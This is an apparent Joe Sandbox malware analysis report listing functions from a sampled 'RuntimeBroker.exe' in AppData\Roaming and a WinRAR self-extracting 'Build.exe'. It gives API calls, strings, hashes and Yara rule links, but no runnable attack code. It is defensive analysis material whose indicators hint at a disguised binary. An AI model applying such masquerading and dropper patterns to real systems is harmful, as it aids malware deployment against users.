Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
Instruction ID: 0aa61c38757d4473b194e0fc7a595c17f3637b4adb96f75ecb8809fc0d7c5ecc
Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
Instruction Fuzzy Hash: 3C11AC22B14F058AEB20DF64EC542B873A0FB09718F840E30DA2D86BB4DF3CD1A98750

Function 00007FF72B074E2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72B070A70: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B070AA3

_get_daylight.LIBCMT ref: 00007FF72B074F44
_get_daylight.LIBCMT ref: 00007FF72B074F55

Strings

?, xrefs: 00007FF72B074ED5

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
Instruction ID: bfc7b82fc04d67e8bb8ad6151a97703bd95c905b85d1948e50f44f589680d349
Opcode Fuzzy Hash: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
Instruction Fuzzy Hash: 58411622F1868242FB76AB29984137DE650EB84BA4F984235EE5D06AF5DF3CD441CF10

Function 00007FFE0C0B4710 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE0C0B6710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE0C0B239E), ref: 00007FFE0C0B671E

_CreateFrameInfo.LIBVCRUNTIME ref: 00007FFE0C0B47E6
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B4844

Strings

csm, xrefs: 00007FFE0C0B48EA

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: abort$CreateFrameInfo
String ID: csm
API String ID: 2697087660-1018135373
Opcode ID: f6943bea1c78c8542bb5a279c29cdd6a6ec40214996e776607272464948ef889
Instruction ID: bcab92e8d25d4cc96c9169b962108c49081e20c7e65ad0b1edca16f543e51396
Opcode Fuzzy Hash: f6943bea1c78c8542bb5a279c29cdd6a6ec40214996e776607272464948ef889
Instruction Fuzzy Hash: 3E51813765878286D620DF1AE45126E77A6FF89B90F140535EB8D07B66CF3CE560CB08

Function 00007FF72B06832C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B06835E

Part of subcall function 00007FF72B069C58: HeapFree.KERNEL32(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C6E
Part of subcall function 00007FF72B069C58: GetLastError.KERNEL32(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C78

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF72B05BEC5), ref: 00007FF72B06837C

Strings

C:\Users\user\AppData\Roaming\RuntimeBroker.exe, xrefs: 00007FF72B06836A

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\AppData\Roaming\RuntimeBroker.exe
API String ID: 3580290477-1543962311
Opcode ID: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
Instruction ID: 2539bdd8084f1cd2cc6cc6601e85a136772b5529dc3f92943a57d9aae840575e
Opcode Fuzzy Hash: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
Instruction Fuzzy Hash: 7F419631B08B5685EB36EF299C400BDA394FF497D0B95403AEA4D47B65DE3CE4818B20

Function 00007FF72B06F8E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B06F916

Part of subcall function 00007FF72B06E8C8: GetCurrentDirectoryW.KERNEL32 ref: 00007FF72B06E908

Strings

:, xrefs: 00007FF72B06F956
., xrefs: 00007FF72B06F967

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: CurrentDirectory_invalid_parameter_noinfo
String ID: .$:
API String ID: 2020911589-4202072812
Opcode ID: 24ee215d7582a2cd552c3f07ddcefb7c5f794b6247eec297d1379fda90ff5b76
Instruction ID: 3de1c373dcebb7a7a1ded97751d954f820a9a13e697d439caecd80a629144a43
Opcode Fuzzy Hash: 24ee215d7582a2cd552c3f07ddcefb7c5f794b6247eec297d1379fda90ff5b76
Instruction Fuzzy Hash: 20414122F0875298FB22EBB99C511FC66B4EF18758F94003DDE4D67A69DF3894468B30

Function 00007FF72B06BF48 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF72B06C05F
GetLastError.KERNEL32 ref: 00007FF72B06C081

Strings

U, xrefs: 00007FF72B06C00B

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
Instruction ID: 873119857340cf7b81fbacf03a0b6f62e81bee505d084e97a1210ff757f0c809
Opcode Fuzzy Hash: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
Instruction Fuzzy Hash: 6C41B462B19A8581EB31AF29E8443B9B760FB88794F944035EE4D877A8DF7CD441CB50

Function 00007FFE0C0B9BAC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0B9CAA

Strings

void, xrefs: 00007FFE0C0B9C0C
void , xrefs: 00007FFE0C0B9C34

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: Name::operator+
String ID: void$void
API String ID: 2943138195-3746155364
Opcode ID: ff67bb32e799e4a453516f5f2b265aba841f0c9d9f12838b8a28f15594d75a10
Instruction ID: ce4e801f37c10c4626536e7532735f535115e307f95c11c31b9b64a11a7e1c76
Opcode Fuzzy Hash: ff67bb32e799e4a453516f5f2b265aba841f0c9d9f12838b8a28f15594d75a10
Instruction Fuzzy Hash: 1D313762E68A6698FB10CB68D8910EC37B5BF48748F440136EF4E22B69DF3CA144C758

Function 00007FF72B06E8C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF72B06E908
GetCurrentDirectoryW.KERNEL32 ref: 00007FF72B06E95A

Strings

:, xrefs: 00007FF72B06E91E

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: e37c33f8f2befd5fbd3c49cdc0b6d52123385b6fd944ea7372e41dd3f6ca63dc
Instruction ID: 9fadecb3cbe0a180659dfe13074b00e3369982ddbd98cc857283155f580d1264
Opcode Fuzzy Hash: e37c33f8f2befd5fbd3c49cdc0b6d52123385b6fd944ea7372e41dd3f6ca63dc
Instruction Fuzzy Hash: 0621C322B0878181EB71AB19D85427EF3A1FB88B48FD54039D68D436A5DF7CE545CF60

Function 00007FFE0C0B604F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE0C0B63F0: RtlPcToFileHeader.KERNEL32 ref: 00007FFE0C0B6434
Part of subcall function 00007FFE0C0B63F0: RaiseException.KERNEL32 ref: 00007FFE0C0B647A

RtlPcToFileHeader.KERNEL32 ref: 00007FFE0C0B60BF

Strings

Bad dynamic_cast!, xrefs: 00007FFE0C0B6072
Access violation - no RTTI data!, xrefs: 00007FFE0C0B604F

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: FileHeader$ExceptionRaise
String ID: Access violation - no RTTI data!$Bad dynamic_cast!
API String ID: 3685223789-3176238549
Opcode ID: d06b4d24d7aa4607bffac334420f89fbd77c373aef9fdd9199db5b082a62258c
Instruction ID: 0c794fa41957efb71b8f6c320988aef9dc529ec445a5ae009f87784bc4ee2b9e
Opcode Fuzzy Hash: d06b4d24d7aa4607bffac334420f89fbd77c373aef9fdd9199db5b082a62258c
Instruction Fuzzy Hash: 610171A1AADA4691EF44DB5CE8A01796322FF90B84F805431E74E076BAEF6DD544C704

Function 00007FF72B05F068 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF72B05F0B8
RaiseException.KERNEL32 ref: 00007FF72B05F0F9

Strings

csm, xrefs: 00007FF72B05F0E6

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
Instruction ID: 89fd6c935d8d503beee6f9cc5e23c572ea05b56471c3aedf89196a466fab4410
Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
Instruction Fuzzy Hash: 66112E36619B4582EB629B19F840269B7E4FB88B84F584231DBCD07B68DF3CD5518B10

Function 00007FFE0C0B63F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FFE0C0B6434
RaiseException.KERNEL32 ref: 00007FFE0C0B647A

Strings

csm, xrefs: 00007FFE0C0B6467

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 04e89f2c23f7d49b97199698fdfbf86ccf7878464e1c577e170b006b6ea557c8
Instruction ID: fc8a6fd9073f8cdc26e931b1be50d9218fa0784eb2f22e35626ae10083f97bf0
Opcode Fuzzy Hash: 04e89f2c23f7d49b97199698fdfbf86ccf7878464e1c577e170b006b6ea557c8
Instruction Fuzzy Hash: 09115132618B8182EB558F19F450269B7A6FF88B84F284231EF8D07769DF3DD551C704

Function 00007FF72B06FA4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B06FA7C
GetDriveTypeW.KERNEL32 ref: 00007FF72B06FABC

Strings

:, xrefs: 00007FF72B06FAA5

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
Instruction ID: 6141efd89a2519dc5b38a0b070ed4cf00c9d334f55a5d81c2ab38af2b1b0785d
Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
Instruction Fuzzy Hash: 80018461B1C24285F732BF689C6127EA390FF4C748FC41039D55D826A5DE7CE504CE24

Function 00007FFE0C0B672C Relevance: 5.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FFE0C0B65B9,?,?,?,?,00007FFE0C0BFB22,?,?,?,?,?), ref: 00007FFE0C0B674B
SetLastError.KERNEL32(?,?,?,00007FFE0C0B65B9,?,?,?,?,00007FFE0C0BFB22,?,?,?,?,?), ref: 00007FFE0C0B67D4

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: c7aaac8a80d8b30c274ca3e3b7c59e83a4e0092024cc1b5b0b7c72c8c7be0031
Instruction ID: 66cc290cb268a5003d1ad91ba2a067464948a6e597e14ad013dfa87586c3f31b
Opcode Fuzzy Hash: c7aaac8a80d8b30c274ca3e3b7c59e83a4e0092024cc1b5b0b7c72c8c7be0031
Instruction Fuzzy Hash: 10113364EC965242FA58D72998641392293AF48BA0F144634EA6E077F5DF2DE941C708

Analysis Process: Build.exePID: 7476, Parent PID: 7396COMMON

Execution Graph

Execution Coverage:	10.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.8%
Total number of Nodes:	1751
Total number of Limit Nodes:	58

Executed Functions

Function 00B5EA07 Relevance: 46.0, APIs: 22, Strings: 4, Instructions: 453
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B5D5DD: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00B5D6C7

Part of subcall function 00B5C5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00B5C5E5

SetFileAttributesW.KERNEL32(?,00000000,?,?,?,00000800,?,CEEE5757,?,00000000,00000001), ref: 00B5EB53
_wcslen.LIBCMT ref: 00B5EB8D
_wcslen.LIBCMT ref: 00B5EBA1
_wcslen.LIBCMT ref: 00B5EBC6
GetFileAttributesW.KERNEL32(?), ref: 00B5EC0C
DeleteFileW.KERNEL32(?), ref: 00B5EC1E
_swprintf.LIBCMT ref: 00B5EC43
GetFileAttributesW.KERNEL32(?), ref: 00B5EC52
MoveFileW.KERNEL32(?,?), ref: 00B5EC6B
MoveFileExW.KERNEL32(?,00000000,00000004), ref: 00B5EC7F
_wcslen.LIBCMT ref: 00B5ECFA
_wcslen.LIBCMT ref: 00B5ED03
SetWindowTextW.USER32(?,?), ref: 00B5ED62

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00B5EE0B
ProgramFilesDir, xrefs: 00B5EE36
<br>, xrefs: 00B5ECC4
%s.%d.tmp, xrefs: 00B5EC36

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: File$_wcslen$Attributes$Move$CurrentDeleteDirectoryEnvironmentExpandStringsTextWindow_swprintf
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2983673336-312220925
Opcode ID: 38cc530877dd6fc95d78e97c3ca4401c63888e232ecc479bb4fb5f7ee9af0159
Instruction ID: 93d1a8833cd60b1137fc49cf4cc471bed37f641dc49563445800a0abb0273558
Opcode Fuzzy Hash: 38cc530877dd6fc95d78e97c3ca4401c63888e232ecc479bb4fb5f7ee9af0159
Instruction Fuzzy Hash: 94F14B72900249AADB25EFA0DC95BEF37ECEB09311F0405AAED19D7190EF749B49CB50

Function 00B6037C Relevance: 40.5, APIs: 17, Strings: 6, Instructions: 208
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B5290A: GetModuleHandleW.KERNEL32 ref: 00B52937
Part of subcall function 00B5290A: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B52949
Part of subcall function 00B5290A: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B52973

Part of subcall function 00B5C5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00B5C5E5

Part of subcall function 00B5CCD9: OleInitialize.OLE32(00000000), ref: 00B5CCF2
Part of subcall function 00B5CCD9: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B5CD29
Part of subcall function 00B5CCD9: SHGetMalloc.SHELL32(00B8C460), ref: 00B5CD33

GetCommandLineW.KERNEL32 ref: 00B603C9
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00B603F3
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 00B60404
UnmapViewOfFile.KERNEL32(00000000), ref: 00B60455

Part of subcall function 00B5FFDD: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B5FFFE
Part of subcall function 00B5FFDD: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B60038

Part of subcall function 00B51421: _wcslen.LIBCMT ref: 00B51445

CloseHandle.KERNEL32(00000000), ref: 00B6045C
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe,00000800), ref: 00B60476
SetEnvironmentVariableW.KERNEL32(sfxname,C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe), ref: 00B60482
GetLocalTime.KERNEL32(?), ref: 00B6048D
_swprintf.LIBCMT ref: 00B604E1
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00B604F6
GetModuleHandleW.KERNEL32(00000000), ref: 00B604FD
LoadIconW.USER32(00000000,00000064), ref: 00B60514
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001DAE0,00000000), ref: 00B60565
Sleep.KERNEL32(?), ref: 00B60593
DeleteObject.GDI32 ref: 00B605CC
DeleteObject.GDI32(?), ref: 00B605DC
CloseHandle.KERNEL32 ref: 00B6061F

Strings

sfxstime, xrefs: 00B604F1
C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe, xrefs: 00B6046F, 00B60474, 00B6047C, 00B60524
sfxname, xrefs: 00B6047D
winrarsfxmappingfile.tmp, xrefs: 00B603E7
STARTDLG, xrefs: 00B6055A
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00B604D2

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3014515783-3227824
Opcode ID: 8ce16c6a566de228f0868fead4f9a80075f1a3006270fe8636bcfecd84237536
Instruction ID: 19c839e30baccdedd1959878f4067b68373009cb0b3db3cdcb9deb7c62f2c4dc
Opcode Fuzzy Hash: 8ce16c6a566de228f0868fead4f9a80075f1a3006270fe8636bcfecd84237536
Instruction Fuzzy Hash: 38710571504340AFD320BB75DC4AF6B7BE8EB45741F0444A9F949932A2EF398988CB61

Function 00B5C652 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,00B5DA3D,00000066), ref: 00B5C665
SizeofResource.KERNEL32(00000000,?,?,?,00B5DA3D,00000066), ref: 00B5C67C
LoadResource.KERNEL32(00000000,?,?,?,00B5DA3D,00000066), ref: 00B5C693
LockResource.KERNEL32(00000000,?,?,?,00B5DA3D,00000066), ref: 00B5C6A2
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00B5DA3D,00000066), ref: 00B5C6BD
GlobalLock.KERNEL32(00000000,?,?,?,?,?,00B5DA3D,00000066), ref: 00B5C6CE
GlobalUnlock.KERNEL32(00000000), ref: 00B5C756

Part of subcall function 00B5C5B6: GdipAlloc.GDIPLUS(00000010), ref: 00B5C5BC

